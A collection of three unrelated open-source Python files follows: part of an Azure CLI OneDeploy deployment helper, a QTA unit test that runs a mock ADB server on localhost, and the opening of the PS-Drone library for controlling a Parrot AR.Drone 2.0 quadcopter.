raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
import json
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e:
raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it".format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deloyment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = False
# check the status of async deployment
if response.status_code == 202:
if poll_async_deployment_for_debugging:
logger.info('Polling the status of the async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name, deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return
if response.status_code == 200:
return
# API not available yet!
if response.status_code == 404:
raise CLIError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise CLIError("Another deployment is in progress. You can track the ongoing deployment at {}".format(deployment_status_url))
# check if an error occurred during deployment
if response.status_code:
raise CLIError("An error occurred during deployment. Status Code: {}, Details: {}".format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Do basic parameter validation
_validate_onedeploy_params(params)
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
_make_onedeploy_request(params)
return logger.info("Deployment has completed successfully")
|
test_adbclient.py
|
# -*- coding: UTF-8 -*-
#
# Tencent is pleased to support the open source community by making QTA available.
# Copyright (C) 2016 THL A29 Limited, a Tencent company. All rights reserved.
# Licensed under the BSD 3-Clause License (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
#
'''Unit tests for the adbclient module
'''
import random
import select
import socket
import struct
import tempfile
import time
import threading
import unittest
try:
from unittest import mock
except:
import mock
from qt4a.androiddriver.adbclient import ADBClient
class Context(object):
'''Context object
'''
def __init__(self):
self._device_id = None
self._file_path = None
@property
def device_id(self):
return self._device_id
@device_id.setter
def device_id(self, id):
self._device_id = id
@property
def file_path(self):
return self._file_path
@file_path.setter
def file_path(self, path):
self._file_path = path
class MockADBServer(object):
'''mock adb server
'''
def __init__(self, port=5037):
self._port = port
self._serv = socket.socket()
self._serv.bind(('127.0.0.1', self._port))
self._serv.listen(1)
self._running = True
t = threading.Thread(target=self.run)
t.setDaemon(True)
t.start()
def stop(self):
self._running = False
self._serv.close()
time.sleep(1)
def run(self):
context_dict = {}
fds = [self._serv]
while self._running:
infds, outfds, errfds = select.select(fds, [], [], 1)
if len(infds) > 0:
for fd in infds:
if fd == self._serv:
try:
sock, _ = fd.accept()
except:
continue
else:
fds.append(sock)
context_dict[sock] = Context()
else:
try:
data = fd.recv(4096)
except:
fd.close()
fds.remove(fd)
else:
if not data:
fd.close()
fds.remove(fd)
else:
response, close_conn = self.handle_input(context_dict[fd], data)
if response: fd.send(response)
if close_conn:
fd.close()
fds.remove(fd)
context_dict.pop(fd)
def handle_input(self, context, data):
'''Handle incoming data
'''
try:
data_len = int(data[:4], 16)
except ValueError:
pass
else:
assert(len(data) == data_len + 4)
data = data[4:4 + data_len]
response = b'OKAY'
close_conn = False
if data == b'host:devices':
data = b'127.0.0.1:21369\tdevice'
response += b'%04x%s' % (len(data), data)
close_conn = True
elif data.startswith(b'host:transport:'):
device_id = data[15:]
context.device_id = device_id
elif data.startswith(b'host-serial:'):
pos = data.find(b':forward:')
if pos > 0:
data = data[pos + 9:]
local, remote = data.split(b';')
pos = data.find(b':get-state')
if pos > 0:
response += b'0006device'
close_conn = True
elif data.startswith(b'host:connect:'):
data = data[13:]
data = b'connected to %s' % data
response += b'%04x%s' % (len(data), data)
close_conn = True
elif data.startswith(b'host:disconnect:'):
data = b'disconnected'
response += b'%04x%s' % (len(data), data)
close_conn = True
elif data.startswith(b'shell:'):
cmdline = data[6:]
if cmdline == b'id':
response += b'uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=kernel'
elif cmdline.startswith(b'echo'):
response += b'\r\n'
elif cmdline.startswith(b'pm '):
response += b'Failure'
else:
raise NotImplementedError(cmdline)
close_conn = True
elif data == b'sync:':
pass
elif data.startswith(b'STAT'):
data_len = struct.unpack('I', data[4:8])[0]
assert(len(data) == data_len + 8)
file_path = data[8:]
context.file_path = file_path
response = b'STAT\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
elif data.startswith(b'SEND'):
data_len = struct.unpack('I', data[4:8])[0]
assert(len(data) == data_len + 8)
response = b''
elif data.startswith(b'DATA'):
data = data[-8:-4]
if data == b'DONE':
response += b'\x00\x00\x00\x00'
close_conn = True
else:
response = b''
elif data.startswith(b'RECV'):
response = b'DATA\x04\x00\x00\x001234'
response += b'DONE\x00\x00\x00\x00'
elif data.startswith(b'DONE'):
response += b'\x00\x00\x00\x00'
close_conn = True
elif data.startswith(b'QUIT'):
response = b''
close_conn = True
elif data == b'framebuffer:':
pass
else:
print(repr(data))
raise NotImplementedError(data)
return response, close_conn
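# Illustrative helper (sketch, not part of the original tests): the ADB host protocol frames each
# request as a 4-character ASCII hex length followed by the payload, which is exactly what
# handle_input() above parses via int(data[:4], 16).
def _frame_adb_request(payload):
    # e.g. b'host:devices' -> b'000chost:devices'
    return b'%04x%s' % (len(payload), payload)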
class TestADBClient(unittest.TestCase):
'''Test cases for the ADBClient class
'''
def setUp(self):
self._port = random.randint(10000, 60000)
self._mock_server = MockADBServer(self._port)
def tearDown(self):
self._mock_server.stop()
def get_client(self):
return ADBClient.get_client('127.0.0.1', self._port)
def get_device_name(self):
return '127.0.0.1:21369'
def test_devices(self):
client = self.get_client()
result = client.devices()
self.assertIn('127.0.0.1:21369\tdevice', result)
def test_shell(self):
client = self.get_client()
stdout, stderr = client.shell(self.get_device_name(), 'id', timeout=10)
self.assertIn(b'uid=0(root)', stdout)
self.assertEqual(stderr, b'')
def test_push(self):
client = self.get_client()
file_path = tempfile.mktemp('.txt')
text = '1' * 1024
with open(file_path, 'w') as fp:
fp.write(text)
result = client.push(self.get_device_name(), file_path, '/data/local/tmp/1.txt')
self.assertIn('1024 bytes in', result)
def test_pull(self):
client = self.get_client()
file_path = tempfile.mktemp('.txt')
client.shell(self.get_device_name(), 'echo 1234 > /data/local/tmp/1.txt', timeout=10)
client.pull(self.get_device_name(), '/data/local/tmp/1.txt', file_path)
with open(file_path, 'r') as fp:
text = fp.read()
self.assertEqual(text.strip(), '1234')
def test_uninstall(self):
client = self.get_client()
result = client.uninstall(self.get_device_name(), 'com.tencent.demo', timeout=20)
self.assertIn('Failure', result)
def test_forward(self):
client = self.get_client()
result = client.forward(self.get_device_name(), 'tcp:12345', 'tcp:12345')
self.assertEqual(result, '')
def test_remove_forward(self):
client = self.get_client()
client.forward(self.get_device_name(), 'tcp:12345', 'tcp:12345')
result = client.remove_forward(self.get_device_name(), 'tcp:12345')
self.assertEqual(result, '')
def test_get_state(self):
client = self.get_client()
result = client.get_state(self.get_device_name())
self.assertEqual(result, 'device')
def test_connect(self):
client = self.get_client()
result = client.connect('127.0.0.1:12345')
self.assertEqual(result, True)
def test_disconnect(self):
client = self.get_client()
result = client.disconnect('127.0.0.1:12345')
self.assertEqual(result, True)
#def test_snapshot_screen(self):
# from PIL import Image
# client = self.get_client()
# result = client.snapshot_screen(self.get_device_name())
# self.assertIsInstance(result, Image.Image)
if __name__ == '__main__':
unittest.main()
|
ps_drone.py
|
#########
# ps_drone.py
# (w)+(c) J. Philipp de Graaff, www.playsheep.de, drone@playsheep.de, 2012-2014
# Project homepage: www.playsheep.de/drone and https://sourceforge.net/projects/ps-drone/
# Dependencies: a POSIX OS, openCV2 for video-support.
# Base-program of the PS-Drone API: "An open and enhanced API for universal control of the Parrot AR.Drone 2.0 quadcopter."
##########
# Modified and advanced version, based on a part of the master of computer science degree dissertation "Universelle
# Kontrolle und Ueberwachung einer Parrot AR.Drone 2.0 auf Basis eines offenen und erweiterten Toolkits"
# by J. Philipp de Graaff, faculty of computer science, Prof. Dr. Hedrich, at the University of Frankfurt / Germany
# Linked at http://www.em.cs.uni-frankfurt.de/index.php?id=43&L=1
# For further details, information, documentation or tutorials visit: www.playsheep.de/drone
##########
# LICENCE:
# Artistic License 2.0 as seen on http://opensource.org/licenses/artistic-license-2.0 (retrieved December 2014)
# If the terms of this license do not permit the full use that you propose to make of PS-Drone, please contact me for a
# different licensing arrangement.
# Visit www.playsheep.de/drone or see the PS-Drone-API-documentation for an abstract from the Artistic License 2.0.
##########
# Dedicated to my beloved wife.
###########
import threading, select, socket, time, tempfile, multiprocessing, struct, os, sys
import thread, signal, subprocess
if os.name == 'posix': import termios, fcntl # for getKey(), ToDo: Reprogram for Windows
if os.name == 'nt': import msvcrt # needed by getKey() on Windows
commitsuicideV, showVid, vCruns, lockV, debugV = False, False, False, threading.Lock(), False # Global variables for video-decoding
offsetND, suicideND, commitsuicideND = 0, False, False # Global variables for NavData-decoding
class Drone(object):
######################################=-
### Start and stop using the drone ###=-
######################################=-
###### Bootup and base configuration
def __init__(self):
self.__Version = "2.0.1"
self.__lock = threading.Lock() # To prevent semaphores
self.__startTime = time.time()
self.__speed = 0.2 # Default drone moving speed in percent.
self.showCommands = False # Shows all sent commands (but not the keepalives)
self.debug = False # Shows some additional debug information
self.valueCorrection = False
self.selfRotation = 0.0185 # use this value, if not checked by getSelfRotation()
self.stopOnComLoss = False # when there is a communication-problem, drone will land or not
# Drone communication variables
self.DroneIP = "192.168.1.1"
self.NavDataPort = 5554
self.VideoPort = 5555
self.CmdPort = 5556
self.CTLPort = 5559
# NavData variables
self.__NavData = ""
self.__State = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
self.__NavDataCount = 0
self.__NavDataTimeStamp = 0.0
self.__NavDataDecodingTime = 0.0
self.__NoNavData = False
# Video variables
self.__VideoImage = None
self.__VideoImageCount = 0
self.__VideoDecodeTimeStamp = 0
self.__VideoDecodeTime = 0
self.__VideoReady = False
self.__vKey = ""
self.__SaveVideo = False
# Config variables
self.__ConfigData = []
self.__ConfigDataCount = 0
self.__ConfigDataTimeStamp = 0
self.__ConfigSending = True
self.__ConfigSessionID = "03016321"
self.__ConfigUserID = "0a100407"
self.__ConfigApplicationID = "03016321"
self.sendConfigSaveMode = False
# Internal variables
self.__NavDataProcess = ""
self.__VideoProcess = ""
self.__vDecodeProcess = ""
self.__ConfigQueue = []
self.__networksuicide = False
self.__receiveDataRunning = False
self.__sendConfigRunning = False
self.__shutdown = False
self.__pDefaultStr = "\033[0m"
self.__pRedStr = "\033[91m"
self.__pGreenStr = "\033[92m"
self.__pYellowStr = "\033[93m"
self.__pBlueStr = "\033[94m"
self.__pPurpleStr = "\033[95m"
self.__pLineUpStr = "\033[1A"
def getImage(self):
vPath = self.__VidPipePath
capture = cv2.VideoCapture(vPath)
success, image = capture.read()
return image
##################################
#img_process(image)
###### Connect to the drone and start all procedures
def startup(self):
# Check for drone in the network and wake it up
try:
socket.socket().connect((self.DroneIP, 21))
socket.socket().close()
except:
self.printRed()
print "Drone is not online"
self.printDefault()
sys.exit(9)
# Internal variables
self.__CmdCounter = 3 # the two raw commands below are sent unnumbered, so numbered commands start at 3
self.__calltime = 0 # to get some time-values to debug
#send the first four initial-commands to the drone
self.__sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # Open network connection
self.__sock.setblocking(0) # Network should not block
self.__sendrawmsg("\r") # Wakes up command port
time.sleep(0.01)
self.__sendrawmsg("AT*PMODE=1,2\rAT*MISC=2,2,20,2000,3000\r") # Initialising drone as sniffed from datastream demo-tool to AR.Drone
##### Initialising timed thread(s) for drone communication
# Opening NavData- and Video- Processes
self.__VidPipePath = tempfile.gettempdir()+"/dronevid-"+str(threading.enumerate()[0])[-12:-2]+"-"+str(time.time())[-7:].replace(".","")+".h264"
self.__net_pipes = []
self.__NavData_pipe, navdataChild_pipe = multiprocessing.Pipe()
self.__Video_pipe, videoChild_pipe = multiprocessing.Pipe()
self.__vdecode_pipe, self.__vdecodeChild_pipe = multiprocessing.Pipe()
self.__NavDataProcess = multiprocessing.Process( target=mainloopND, args=(self.DroneIP,self.NavDataPort,navdataChild_pipe,os.getpid()))
self.__NavDataProcess.start()
self.__VideoProcess = multiprocessing.Process( target=mainloopV, args=(self.DroneIP,self.VideoPort,self.__VidPipePath,videoChild_pipe,os.getpid()))
self.__VideoProcess.start()
self.__vDecodeProcess = multiprocessing.Process( target=vDecode, args=(self.__VidPipePath,self.__vdecodeChild_pipe,os.getpid()))
# There is a third process called "self.__vDecodeProcess" for decoding video, initiated and started around line 880
# Final settings
self.useDemoMode(True) # This entry is necessary for the drone's firmware, otherwise the NavData contains just header and footer
self.setConfig("custom:session_id","-all")
self.getNDpackage(["demo"])
time.sleep(1)
#setup Network-thread
while not self.__receiveDataRunning or not self.__sendConfigRunning or len(self.__ConfigQueue): # sometimes the threads do not start, for whatever reason, so this loop double-checks
if not self.__receiveDataRunning:
self.__threadReceiveData=threading.Thread(target=self.__receiveData)
self.__threadReceiveData.start()
time.sleep(0.05)
if not self.__sendConfigRunning:
self.__threadSendConfig=threading.Thread(target=self.__sendConfig)
self.__threadSendConfig.start()
time.sleep(0.05)
time.sleep(0.01)
###### Clean Shutdown
def shutdown(self):
if self.__shutdown: sys.exit()
self.__shutdown = True
if self.debug: print "Shutdown..."
self.land()
self.thrust(0,0,0,0)
try: self.__NavData_pipe.send("die!")
except: pass
self.__Video_pipe.send("uninit")
t=time.time()
while self.__VideoReady and (time.time()-t)<5: time.sleep(0.1)
try: self.__Video_pipe.send("die!")
except: pass
time.sleep(0.5)
try: self.__VideoProcess.terminate()
except: pass
try: self.__vDecodeProcess.terminate()
except: pass
try: self.__NavDataProcess.terminate()
except: pass
self.__stopnetwork()
try: self.__threadSendConfig.join()
except: pass
try: self.__threadReceiveData.join()
except: pass
self.__keepalive.cancel()
sys.exit()
##############################################################=-
### Make internal variables to external read-only variables ###=-
##############################################################=-
@property
def Version(self): return self.__Version
@property
def startTime(self): return self.__startTime
@property
def speed(self): return self.__speed
@property
def NavData(self): return self.__NavData
@property
def State(self): return self.__State
@property
def NavDataCount(self): return self.__NavDataCount
@property
def NavDataTimeStamp(self): return self.__NavDataTimeStamp
@property
def NavDataDecodingTime(self): return self.__NavDataDecodingTime
@property
def NoNavData(self): return self.__NoNavData
@property
def VideoImage(self): return self.__VideoImage
@property
def VideoImageCount(self): return self.__VideoImageCount
@property
def VideoDecodeTimeStamp(self): return self.__VideoDecodeTimeStamp
@property
def VideoDecodeTime(self): return self.__VideoDecodeTime
@property
def VideoReady(self): return self.__VideoReady
@property
def SaveVideo(self): return self.__SaveVideo
@property
def ConfigData(self): return self.__ConfigData
@property
def ConfigDataCount(self): return self.__ConfigDataCount
@property
def ConfigDataTimeStamp(self): return self.__ConfigDataTimeStamp
@property
def ConfigSending(self): return self.__ConfigSending
@property
def ConfigSessionID(self): return self.__ConfigSessionID
@property
def ConfigUserID(self): return self.__ConfigUserID
@property
def ConfigApplicationID(self): return self.__ConfigApplicationID
######################=-
### Drone commands ###=-
######################=-
###### Commands for configuration
# change some value
def setConfig(self, name, value): # e.g. drone.setConfig("control:altitude_max","5000")
self.__ConfigQueue.append([str(name), str(value), False]) # Note: changes are not immediately and could take some time
# change some value and send the configuration Identifier (sendConfigIDs) ahead
def setMConfig(self, name, value): # Usage like setConfig
self.__ConfigQueue.append([str(name), str(value), True]) # Note: changes are not immediately and could take some time
# get actual configuration
def getConfig(self): # Stored in "ConfigData"
self.at("CTRL", [5,0]) # Wow, that is new, was not necessary before
self.at("CTRL", [4,0]) # Note: Actual configuration data will be received after setting...
if self.showCommands: self.__calltime = time.time() # ... automatically. An update will take up to 0.015 sec)
# Setting IDs to store configurations for later
def setConfigSessionID(self, *args):
try:
value = float(args[0])
self.__ConfigSessionID = normalLen8(value)
self.setConfig("custom:session_id", self.__ConfigSessionID)
except: return (self.__ConfigSessionID)
def setConfigUserID(self, *args):
try:
value = float(args[0])
self.__ConfigUserID = normalLen8(value)
self.setConfig("custom:profile_id", self.__ConfigUserID)
except: return (self.__ConfigUserID)
def setConfigApplicationID(self, *args):
try:
value = float(args[0])
self.__ConfigApplicationID = normalLen8(value)
self.setConfig("custom:application_id", self.__ConfigApplicationID)
except: return (self.__ConfigApplicationID)
def setConfigAllID(self):
self.setConfig("custom:session_id", self.__ConfigSessionID)
self.setConfig("custom:profile_id", self.__ConfigUserID)
self.setConfig("custom:application_id", self.__ConfigApplicationID)
# Reminds the drone which IDs it has to use (important for e.g. switch cameras)
def sendConfigIDs(self):
self.at("CONFIG_IDS", [self.__ConfigSessionID,self.__ConfigUserID,self.__ConfigApplicationID])
###### Calibration
def trim(self):
self.at("FTRIM", [])
def mtrim(self):
self.at("CALIB", [0])
def mantrim(self, thetaAngle, phiAngle, yawAngle): # manual Trim
if self.valueCorrection:
try: thetaAngle = float(thetaAngle)
except: thetaAngle = 0.0
try: phiAngle = float(phiAngle)
except: phiAngle = 0.0
try: yawAngle = float(yawAngle)
except: yawAngle = 0.0
self.at("MTRIM", [thetaAngle,phiAngle,yawAngle]) # floats
def getSelfRotation(self, wait):
if self.valueCorrection:
try: wait = float(wait)
except: wait = 1.0
reftime = time.time()
oangle = self.__NavData["demo"][2][2] # detects the self-rotation-speed of the yaw-sensor
time.sleep(wait)
self.selfRotation = (self.__NavData["demo"][2][2]-oangle)/(time.time()-reftime)
return self.selfRotation
###### Movement
# Default speed of movement
def setSpeed(self, *speed):
try: self.__speed = self.__checkSpeedValue(*speed)
except: pass
return self.__speed
# Absolute movement in x, y and z-direction and rotation
def move(self, leftright, backwardforward, downup, turnleftright): # Absolute movement in x, y and z-direction and rotation
if self.valueCorrection:
try: leftright = float(leftright)
except: leftright = 0.0
try: backwardforward = float(backwardforward)
except: backwardforward = 0.0
try: downup = float(downup)
except: downup = 0.0
try: turnleftright = float(turnleftright)
except: turnleftright = 0.0
if leftright > 1.0: leftright = 1.0
if leftright < -1.0: leftright = -1.0
if backwardforward > 1.0: backwardforward = 1.0
if backwardforward < -1.0: backwardforward = -1.0
if downup > 1.0: downup = 1.0
if downup < -1.0: downup = -1.0
if turnleftright > 1.0: turnleftright = 1.0
if turnleftright < -1.0: turnleftright = -1.0
self.at("PCMD", [3 ,leftright, -backwardforward, downup, turnleftright])
# Relative movement to controller in x, y and z-direction and rotation
def relMove(self, leftright, backwardforward, downup, turnleftright, eastwest, northturnawayaccuracy):
if self.valueCorrection:
try: leftright = float(leftright)
except: leftright = 0.0
try: backwardforward = float(backwardforward)
except: backwardforward = 0.0
try: downup = float(downup)
except: downup = 0.0
try: turnleftright = float(turnleftright)
except: turnleftright = 0.0
if leftright > 1.0: leftright = 1.0
if leftright < -1.0: leftright = -1.0
if backwardforward > 1.0: backwardforward = 1.0
if backwardforward < -1.0: backwardforward = -1.0
if downup > 1.0: downup = 1.0
if downup < -1.0: downup = -1.0
if turnleftright > 1.0: turnleftright = 1.0
if turnleftright < -1.0: turnleftright = -1.0
self.at("PCMD_MAG", [1 ,leftright, -backwardforward, downup, turnleftright, eastwest, northturnawayaccuracy])
# Stop moving
def hover(self):
self.at("PCMD", [0,0.0,0.0,0.0,0.0])
def stop(self): # Hammertime !
self.hover()
# Basic movements
def moveLeft(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move(-self.__checkSpeedValue(speed),0.0,0.0,0.0)
def moveRight(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move( self.__checkSpeedValue(speed),0.0,0.0,0.0)
def moveForward(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move(0.0, self.__checkSpeedValue(speed),0.0,0.0)
def moveBackward(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move(0.0,-self.__checkSpeedValue(speed),0.0,0.0)
def moveUp(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move(0.0,0.0, self.__checkSpeedValue(speed),0.0)
def moveDown(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move(0.0,0.0,-self.__checkSpeedValue(speed),0.0)
def turnLeft(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move(0.0,0.0,0.0,-self.__checkSpeedValue(speed))
def turnRight(self,*args):
try: speed=args[0]
except: speed=self.__speed
self.move(0.0,0.0,0.0, self.__checkSpeedValue(speed))
# Lets the drone rotate defined angle
# BUG: does not work with 180deg. turns
# ToDo: Should be able to stop in case of failures
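# Example (illustrative, assuming NavData is already flowing): drone.turnAngle(90, 0.5) turns
# roughly 90 degrees to the right at up to half speed; drone.turnAngle(-45, 0.3, 0.05) turns
# 45 degrees to the left with an accuracy window of +/-0.05 degrees.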
def turnAngle(self,ndir,speed,*args):
opos = self.__NavData["demo"][2][2] # get the source/current (original) angle
npos = opos+ndir # calculate the destination (new) angle
minaxis = opos # to make sure, that the jump from -180 to 180 will...
maxaxis = opos # ...be correctly handled
speed = self.__checkSpeedValue(speed)
ospeed = speed # stores the given speed-value
reftime = time.time()
accurateness = 0
try: accurateness = args[0]
except: pass
if accurateness<=0:
accurateness = 0.005 # Destination angle can differ +/- this value (not demo-mode)
if self.__State[10]: accurateness = 0.1 # Destination angle can differ +/- this value in demo-mode
stop = False
while not stop:
ndc = self.__NavDataCount # wait for the next NavData-package
while ndc == self.__NavDataCount: time.sleep(0.001)
kalib = (time.time()-reftime)*self.selfRotation # compensates for yaw-sensor drift of around 0.0185 deg/sec
cpos = self.__NavData["demo"][2][2] # get the current angle
if minaxis > cpos: minaxis = cpos # set the minimal seen angle
if maxaxis < cpos: maxaxis = cpos # set the maximal seen angle
if cpos-minaxis >= 180: cpos = cpos-360 # correct the angle-value if necessary...
elif maxaxis-cpos >= 180: cpos = cpos+360 # ...for an easier calculation
speed = abs(cpos-npos+kalib) / 10.0 # the closer to the destination the slower the drone turns
if speed > ospeed: speed = ospeed # do not turn faster than recommended
if speed < 0.05: speed = 0.05 # too slow turns causes complications with calibration
self.__speed = speed
if cpos > (npos+kalib): self.turnLeft() # turn left, if destination angle is lower
else: self.turnRight() # turn right if destination angle is higher
if cpos < (npos+kalib+accurateness) and cpos > (npos+kalib-accurateness):# if angle is reached...
self.stop() # ...stop turning
time.sleep(0.01)
stop = True
return(True)
def takeoff(self):
self.at("REF", [290718208]) #290718208=10001010101000000001000000000
def land(self):
self.at("REF", [290717696]) #290717696=10001010101000000000000000000
###### NavData commands
# Switches to Demo- or Full-NavData-mode
def useDemoMode(self,value):
if value: self.setConfig("general:navdata_demo", "TRUE")
else: self.setConfig("general:navdata_demo", "FALSE")
def useMDemoMode(self,value):
if value: self.setMConfig("general:navdata_demo", "TRUE")
else: self.setMConfig("general:navdata_demo", "FALSE")
def getNDpackage(self,packets):
self.__NavData_pipe.send(("send",packets))
def addNDpackage(self,packets):
self.__NavData_pipe.send(("add",packets))
def delNDpackage(self,packets):
self.__NavData_pipe.send(("block",packets))
def reconnectNavData(self):
self.__NavData_pipe.send("reconnect")
###### Video & Marker commands
# This makes the drone fly around and follow 2D tags which the camera is able to detect.
def aflight(self, flag):
self.at("AFLIGHT", [flag]) #Integer: 1: start flight, 0: stop flight
def slowVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.__Video_pipe.send("slowVideo")
else: self.__Video_pipe.send("fastVideo")
def midVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.__Video_pipe.send("midVideo")
else: self.__Video_pipe.send("fastVideo")
def fastVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.__Video_pipe.send("fastVideo")
else: self.__Video_pipe.send("slowVideo")
def saveVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.__Video_pipe.send("saveVideo")
else: self.__Video_pipe.send("unsaveVideo")
def startVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.__Video_pipe.send("init")
else: self.stopVideo()
def stopVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.__Video_pipe.send("uninit")
else: self.startVideo()
def showVideo(self, *args):
try: do = args[0]
except: do = True
if do:
self.__Video_pipe.send("init")
self.__Video_pipe.send("show")
else: self.hideVideo()
def hideVideo(self, *args):
try: do = args[0]
except: do = True
if do:
self.__Video_pipe.send("init")
self.__Video_pipe.send("hide")
else: self.showVideo()
# Selects which video stream to send on the video UDP port.
def hdVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.setMConfig("video:video_codec","131")
else: self.setMConfig("video:video_codec","129")
def sdVideo(self, *args):
try: do = args[0]
except: do = True
if do: self.setMConfig("video:video_codec","129")
else: self.setMConfig("video:video_codec","131")
def mp4Video(self, *args):
try: do = args[0]
except: do = True
if do: self.setMConfig("video:video_codec","128")
else: self.setMConfig("video:video_codec","129")
# Selects which video-framerate (in frames per second) to send on the video UDP port.
def videoFPS(self, fps):
try:
int(fps)
if fps>60: fps = 60
elif fps<1: fps = 1
self.setMConfig("video:codec_fps",fps)
except: pass
# Selects which video-bitrate (in kilobit per second) to send on the video UDP port.
def videoBitrate(self, bitrate):
try:
int(bitrate)
if bitrate > 20000: bitrate = 20000
if bitrate < 250: bitrate = 250
self.setMConfig("video:bitrate",bitrate)
except: pass
# Selects which video stream to send on the video UDP port.
def frontCam(self, *args):
try: do = args[0]
except: do = True
if do: self.setMConfig("video:video_channel","0")
else: self.setMConfig("video:video_channel","1")
def groundCam(self, *args):
try: do = args[0]
except: do = True
if do: self.setMConfig("video:video_channel","1")
else: self.setMConfig("video:video_channel","0")
### Misc commands
def reset(self):
if self.NavDataCount>0 and self.State[31]==1:
self.at("REF", [290717952]) #290717952=10001010101000000000100000000
def thrust(self, fl, fr, rl, rr): # Controls engines directly, overriding control loops.
fl *= 2
if fl > 64000: fl = 64000
elif fl < 0: fl = 0
fr *= 2
if fr > 64000: fr = 64000
elif fr < 0: fr = 0
rl *= 2
if rl > 64000: rl = 64000
elif rl < 0: rl = 0
rr *= 2
if rr > 64000: rr = 64000
elif rr < 0: rr = 0
self.at("PWM", [int(fl), int(fr), int(rr), int(rl)])
# It seems the integer values can range from 0 (stop) to 511 (full); values above 511 seem to have no effect.
# Beware: using too-high values (e.g. floats (>64k ?)) causes side-effects like restarting other motors, etc.
# The drone will shut down if its flight-angle exceeds the configured limit.
# Control the drone's LED.
def led(self, animation, frequency, duration):
if animation < 21 and frequency > 0 and duration >= 0:
self.at("LED", [animation, float(frequency), duration])
# Makes the drone execute a predefined movement (animation).
def anim(self, animation, duration):
if animation < 20 and duration >= 0:
self.at("ANIM", [animation, duration])
#########################=-
### Low-level Commands ###=-
#########################=-
# Upgrading the basic drone commands to low-level drone commands:
# Adding command-number, checking the values, convert 32-bit float to 32-bit integer and put it in quotes
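# Example (illustrative): a float parameter is reinterpreted bitwise as a 32-bit integer, e.g.
#   struct.unpack("i", struct.pack("f", -0.5))[0] == -1090519040
# so drone.at("PCMD", [1, 0.0, -0.5, 0.0, 0.0]) is sent as "AT*PCMD=<counter>,1,0,-1090519040,0,0\r";
# string parameters are wrapped in double quotes instead.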
def at(self, command, params):
self.__lock.acquire()
paramLn = ""
if params:
for p in params:
if type(p) == int: paramLn += ","+str(p)
elif type(p) == float: paramLn += ","+str(struct.unpack("i", struct.pack("f", p))[0])
elif type(p) == str: paramLn += ",\""+p+"\""
msg = "AT*"+command+"="+str(self.__CmdCounter)+paramLn+"\r"
self.__CmdCounter += 1
self.__sendrawmsg(msg)
self.__lock.release()
# Sending the low-level drone-readable commands to the drone...better do not use
def __sendrawmsg(self, msg):
try: self.__keepalive.cancel()
except: pass
if self.showCommands:
if msg.count("COMWDG") < 1: print msg
self.__sock.sendto(msg, (self.DroneIP, self.CmdPort))
self.__keepalive = threading.Timer(0.1, self.__heartbeat)
self.__keepalive.start()
#############################=-
### Convenient Commands ###=-
#############################=-
# Just add water
# Checks the battery-status
def getBattery(self):
batStatus = "OK"
batValue = 0
if self.__State[15] == 1: batStatus = "empty"
try: batValue = self.__NavData['demo'][1]
except: batValue = -1
return (batValue,batStatus) # Percent & status ("OK", "empty")
# Calculates the minor difference between two angles as the drone gives values from -180 to 180...
# ...so e.g. 170 and -160 are +30 difference and drone will turn to the correct direction
